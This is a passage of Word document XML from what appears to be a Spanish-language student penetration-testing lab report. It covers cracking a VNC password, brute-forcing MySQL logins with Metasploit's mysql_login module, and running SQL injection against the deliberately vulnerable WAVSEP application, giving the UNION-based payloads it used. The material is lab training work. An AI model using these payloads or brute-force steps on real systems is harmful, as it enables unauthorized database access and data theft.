          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">creamos a la vez </w:t>
      </w:r>
      <w:r w:rsidR="00751489">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>un</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> diccionario para las contraseñas y </w:t>
      </w:r>
      <w:r w:rsidR="00C71FAF">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">otro para usuarios (opcional) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>procedemos a configurar</w:t>
      </w:r>
      <w:r w:rsidR="00C71FAF">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F6BE88" w14:textId="76B3524D" w:rsidR="002C42CF" w:rsidRPr="002C42CF" w:rsidRDefault="00751489" w:rsidP="002C42CF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58694B42" wp14:editId="3114DB91">
            <wp:extent cx="5612130" cy="583565"/>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83565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B4E6C5" w14:textId="0BF6E8F9" w:rsidR="002C42CF" w:rsidRDefault="00751489" w:rsidP="00751489">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A5447F7" wp14:editId="2E59885A">
            <wp:extent cx="4780952" cy="3800000"/>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0952" cy="3800000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD0DEB7" w14:textId="463CAE89" w:rsidR="002C42CF" w:rsidRDefault="00C71FAF" w:rsidP="00DD5B4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21009AE8" wp14:editId="53F4DD4B">
            <wp:extent cx="5612130" cy="4851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85140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BACF30" w14:textId="6B186F1C" w:rsidR="002C42CF" w:rsidRPr="00C71FAF" w:rsidRDefault="00C71FAF" w:rsidP="00DD5B4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Una vez teniendo la contraseña procedemos a colocar el comando vncviewer</w:t>
      </w:r>
      <w:r w:rsidR="008A393D">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7567F62D" w14:textId="5A02B396" w:rsidR="002C42CF" w:rsidRDefault="008A393D" w:rsidP="00DD5B4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57352894" wp14:editId="6D50BB15">
            <wp:extent cx="3883231" cy="1283713"/>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850" cy="1286893"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5F010A" w14:textId="77777777" w:rsidR="008D273B" w:rsidRDefault="008D273B" w:rsidP="008D273B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Arial" w:hAnsi="Georgia" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Arial" w:hAnsi="Georgia" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pruebas de explotación en el puerto 3306 MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B7D891" w14:textId="77777777" w:rsidR="008D273B" w:rsidRDefault="008D273B" w:rsidP="008D273B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Antes de comenzar los ataques hay que crear un diccionario para nombres de usuario y otro para las contraseñas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFBF6F0" w14:textId="77777777" w:rsidR="008D273B" w:rsidRDefault="008D273B" w:rsidP="008D273B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55D25FDB" wp14:editId="220B4652">
            <wp:extent cx="2349795" cy="92342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8603" cy="926890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3CB402" w14:textId="77777777" w:rsidR="008D273B" w:rsidRPr="00DE3BE7" w:rsidRDefault="008D273B" w:rsidP="008D273B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE3BE7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Después con </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3BE7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3BE7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">buscamos el exploit: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3BE7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>auxiliary/scanner/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3BE7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3BE7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">_login </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3BE7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Arial" w:hAnsi="Georgia" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>y configuramos los siguientes datos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B0594F" w14:textId="479B40A8" w:rsidR="008D273B" w:rsidRDefault="008D273B" w:rsidP="00DD5B4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="025C035C" wp14:editId="1496C687">
            <wp:extent cx="4795284" cy="1517584"/>
            <wp:effectExtent l="0" t="0" r="571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2546" cy="1523047"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0C39E9" w14:textId="11910ED7" w:rsidR="008D273B" w:rsidRDefault="0073215E" w:rsidP="00DD5B4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04F2FC1E" wp14:editId="59CFE8CD">
            <wp:extent cx="5612130" cy="12134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0848" cy="1224019"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8C58EC" w14:textId="789C8B62" w:rsidR="008D273B" w:rsidRPr="001E2E94" w:rsidRDefault="001E2E94" w:rsidP="00DD5B4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E2E94">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprobamos con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>el usuario obtenido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1970494E" w14:textId="0325C8E7" w:rsidR="008D273B" w:rsidRDefault="001E2E94" w:rsidP="00DD5B4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B98E90F" wp14:editId="26D894FA">
            <wp:extent cx="3349766" cy="2413591"/>
            <wp:effectExtent l="0" t="0" r="317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5387" cy="2417641"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E41028B" w14:textId="4F9F75B4" w:rsidR="007649DA" w:rsidRDefault="007649DA" w:rsidP="00DD5B4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>VULNERABILIDADES EN WAVSEP EN LA MAQUINA OWASPBW</w:t>
      </w:r>
      <w:r w:rsidR="000F0E63">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5133397F" w14:textId="78F8E064" w:rsidR="007649DA" w:rsidRDefault="007649DA" w:rsidP="00DD5B4A">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70F2A122" wp14:editId="26B6F642">
            <wp:extent cx="5612130" cy="24853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485390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC54227" w14:textId="7087CCAC" w:rsidR="007649DA" w:rsidRDefault="007649DA" w:rsidP="00A87A2C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C3E217" w14:textId="2F29363D" w:rsidR="007649DA" w:rsidRDefault="007649DA" w:rsidP="00A87A2C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Usamos el siguiente link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r w:rsidRPr="00E42A0E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.2.101:8080/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case02-InjectionInSearch-String-UnionExploit-With200Errors.jsp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D84F785" w14:textId="77777777" w:rsidR="007649DA" w:rsidRPr="007649DA" w:rsidRDefault="007649DA" w:rsidP="00A87A2C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007649DA">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Probamos con diferentes ataques para sacar información de la base de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ECCAF7" w14:textId="7606A844" w:rsidR="007649DA" w:rsidRDefault="007649DA" w:rsidP="00A87A2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007649DA">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>a)</w:t>
      </w:r>
      <w:r w:rsidRPr="007649DA">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:tab/>
        <w:t>a' UNION ALL SELECT 1,2, @@version;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78722C64" w14:textId="31767887" w:rsidR="007649DA" w:rsidRPr="00DF77AB" w:rsidRDefault="007649DA" w:rsidP="007649DA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF77AB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="680AE52F" wp14:editId="05072640">
            <wp:extent cx="5400000" cy="174285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1742857"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FAB14E" w14:textId="3331E54F" w:rsidR="007649DA" w:rsidRPr="00DF77AB" w:rsidRDefault="00A87A2C" w:rsidP="007649DA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF77AB">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t xml:space="preserve">Y </w:t>
      </w:r>
      <w:r w:rsidR="00DF77AB" w:rsidRPr="00DF77AB">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>confirmamos</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF77AB">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t xml:space="preserve"> que este campo es vulnerable a la inyección SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79915C6D" w14:textId="7D9FFD85" w:rsidR="00A87A2C" w:rsidRPr="000A77CB" w:rsidRDefault="00A87A2C" w:rsidP="007649DA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A77CB">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Probamos con otro </w:t>
      </w:r>
      <w:r w:rsidR="00DF77AB" w:rsidRPr="000A77CB">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Código</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30346450" w14:textId="64F921D5" w:rsidR="00A87A2C" w:rsidRPr="00A87A2C" w:rsidRDefault="00A87A2C" w:rsidP="007649DA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4493E13D" w14:textId="7834BA79" w:rsidR="00A87A2C" w:rsidRPr="00A87A2C" w:rsidRDefault="00A87A2C" w:rsidP="007649DA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19E2A194" w14:textId="265D7AB7" w:rsidR="00A87A2C" w:rsidRPr="00A87A2C" w:rsidRDefault="00A87A2C" w:rsidP="007649DA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65218BDE" w14:textId="0DFB2AD8" w:rsidR="007649DA" w:rsidRDefault="007649DA" w:rsidP="007649DA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00055CCF">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>b)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00055CCF">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> a' UNION select 1, table_schema,table_name FROM information_Schema.tables;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A75DE8" w14:textId="6ACA8B62" w:rsidR="007649DA" w:rsidRDefault="007649DA" w:rsidP="007649DA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77522369" w14:textId="15302DA4" w:rsidR="007649DA" w:rsidRDefault="007649DA" w:rsidP="007649DA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56D1FFC9" wp14:editId="514EA9B8">
            <wp:extent cx="5600000" cy="5780952"/>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0000" cy="5780952"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7453B76E" w14:textId="4AB0EDE9" w:rsidR="00EB016B" w:rsidRDefault="00EB016B" w:rsidP="007649DA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00A3D7F1" w14:textId="289FF94A" w:rsidR="00EB016B" w:rsidRDefault="00EB016B" w:rsidP="007649DA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C2B6354" w14:textId="33736204" w:rsidR="00EB016B" w:rsidRPr="00EB016B" w:rsidRDefault="00EB016B" w:rsidP="00EB016B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB016B">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Ahora probaremos otros ataques e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
